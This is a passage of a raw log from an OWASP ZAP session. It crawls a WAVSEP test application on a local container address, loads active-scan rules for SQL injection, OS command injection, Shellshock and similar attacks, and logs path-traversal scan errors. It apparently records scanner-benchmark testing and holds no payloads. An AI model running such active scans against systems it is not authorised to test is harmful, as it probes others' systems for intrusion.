Crawl depth is now 1 3799413 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3800749 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3802277 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state603 and state14 are the same. 3802280 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3804567 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3805729 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3807035 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3808626 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state604 added to the StateMachine. 3808626 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3808637 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3810952 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3812113 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3813405 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3815103 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state605 and state14 are the same. 3815110 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3817404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3818570 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3819901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3821435 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state606 added to the StateMachine. 3821435 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3821445 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3823736 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3824898 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3826196 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3827874 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state607 and state14 are the same. 3827878 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3830175 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3831338 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3832668 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3834254 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state608 added to the StateMachine. 3834254 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3834263 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3836551 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3837715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3839256 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3840806 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state609 and state516 are the same. 3840810 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3843137 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3844330 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3845696 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3847253 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state610 added to the StateMachine. 3847253 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3847262 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3849590 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3850780 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3852145 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3853689 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state611 and state516 are the same. 3853693 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3856009 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3857173 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3858476 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3860177 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state612 added to the StateMachine. 3860177 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3860191 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3862526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3863710 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3865028 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3866576 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state613 added to the StateMachine. 3866576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3866585 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3868907 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3870072 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3871374 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3872915 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state614 added to the StateMachine. 3872915 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3872924 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3875240 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3876414 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3877715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3879269 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state615 added to the StateMachine. 3879269 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3879278 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3881602 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3882766 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3884071 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3885617 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state616 added to the StateMachine. 3885617 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3885626 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 1 states with unfired actions 3887939 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3889103 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3890407 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3891964 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state617 added to the StateMachine. 3891964 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3891974 [pool-2-thread-2] INFO com.crawljax.browser.WebDriverBackedEmbeddedBrowser - Closing the browser... 3891975 [Thread-63] INFO com.crawljax.core.CrawlController - Received shutdown notice. Reason is Exausted 3891987 [pool-2-thread-2] INFO com.crawljax.browser.WebDriverBackedEmbeddedBrowser - Interrupted while waiting for the browser to close. It might not close correctly 3891987 [Thread-63] INFO com.crawljax.core.CrawlController - Shutdown process complete 3891987 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Stopping proxy... 3892087 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Proxy stopped. 3892087 [Thread-63] INFO org.zaproxy.zap.extension.spiderAjax.SpiderThread - Finished crawljax targeting http://172.17.0.2:8080/wavsep/index-active.jsp 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Path Traversal 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote File Inclusion 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Server Side Include 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Reflected) 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) 3897289 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Server Side Code Injection 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote OS Command Injection 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Directory Browsing 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin External Redirect 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Buffer Overflow 3897290 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Format String Error 3897291 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin CRLF Injection 3897291 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Parameter Tampering 3897291 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) - Prime 3897291 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) - Spider 3897291 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Script Active Scan Rules 3897292 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - SVN 3897292 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - /WEB-INF folder 3897292 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote Code Execution - Shell Shock 3897292 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Anti CSRF Tokens Scanner 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Heartbleed OpenSSL Vulnerability 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross-Domain Misconfiguration 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - CVE-2012-1823 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote Code Execution - CVE-2012-1823 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Session Fixation 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - MySQL 3897293 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - Hypersonic SQL 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - Oracle 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - PostgreSQL 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Advanced SQL Injection 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin XPath Injection 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin XML External Entity Attack 3897294 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Generic Padding Oracle 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Expression Language Injection 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Backup File Disclosure 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Integer Overflow Error 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Insecure HTTP Method 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin HTTP Parameter Pollution scanner 3897295 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Possible Username Enumeration 3897296 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - Git 3897296 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - File Inclusion 3897296 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin LDAP Injection 3897296 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - SQLite 3897296 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (DOM Based) 3897297 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Example Active Scanner: Denial of Service 3897297 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin An example active scan rule which loads data from a file 3897297 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SOAP Action Spoofing 3897297 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SOAP XML Injection 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Relative Path Confusion 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin User Agent Fuzzer 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Integer Overflow Error 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - Ignoring (apparently) less stable scanner version, id=30003, ExistingPlugin[Status=beta, Class=org.zaproxy.zap.extension.ascanrulesBeta.IntegerOverflow], LessStablePlugin[Status=alpha, Class=org.zaproxy.zap.extension.ascanrulesAlpha.IntegerOverflow] 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Proxy Disclosure 3897298 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin HTTPS Content Available via HTTP 3897299 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cookie Slack Detector 3897302 [ZAP-ProxyThread-2390] INFO org.parosproxy.paros.core.scanner.Scanner - scanner started 3897304 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Path Traversal 3897304 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote File Inclusion 3897304 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Server Side Include 3897305 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Reflected) 3897305 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) 3897305 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection 3897305 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Server Side Code Injection 3897305 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote OS Command Injection 3897306 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Directory Browsing 3897306 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin External Redirect 3897306 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Buffer Overflow 3897306 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Format String Error 3897307 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin CRLF Injection 3897307 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Parameter Tampering 3897307 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) - Prime 3897308 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (Persistent) - Spider 3897308 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Script Active Scan Rules 3897308 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - SVN 3897308 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - /WEB-INF folder 3897309 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote Code Execution - Shell Shock 3897309 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Anti CSRF Tokens Scanner 3897309 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Heartbleed OpenSSL Vulnerability 3897309 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross-Domain Misconfiguration 3897310 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - CVE-2012-1823 3897310 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Remote Code Execution - CVE-2012-1823 3897310 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Session Fixation 3897310 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - MySQL 3897310 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - Hypersonic SQL 3897311 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - Oracle 3897311 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - PostgreSQL 3897311 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Advanced SQL Injection 3897311 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin XPath Injection 3897312 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin XML External Entity Attack 3897312 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Generic Padding Oracle 3897312 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Expression Language Injection 3897312 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Backup File Disclosure 3897313 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Integer Overflow Error 3897313 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Insecure HTTP Method 3897313 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin HTTP Parameter Pollution scanner 3897313 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Possible Username Enumeration 3897314 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - Git 3897314 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Source Code Disclosure - File Inclusion 3897314 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin LDAP Injection 3897314 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SQL Injection - SQLite 3897315 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cross Site Scripting (DOM Based) 3897315 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Example Active Scanner: Denial of Service 3897315 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin An example active scan rule which loads data from a file 3897315 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SOAP Action Spoofing 3897315 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin SOAP XML Injection 3897316 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Relative Path Confusion 3897316 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin User Agent Fuzzer 3897316 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Proxy Disclosure 3897316 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin HTTPS Content Available via HTTP 3897317 [Thread-65] INFO org.parosproxy.paros.core.scanner.PluginFactory - loaded plugin Cookie Slack Detector 3897322 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestPathTraversal strength LOW threshold MEDIUM 3901317 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: Connection reset java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.zaproxy.zap.ZapGetMethod.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:329) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 3903328 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 3903328 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 3903334 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 3903719 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 3903722 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 3981037 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: Connection reset java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:379) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 3983044 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: Connection reset java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:379) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 3984036 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters 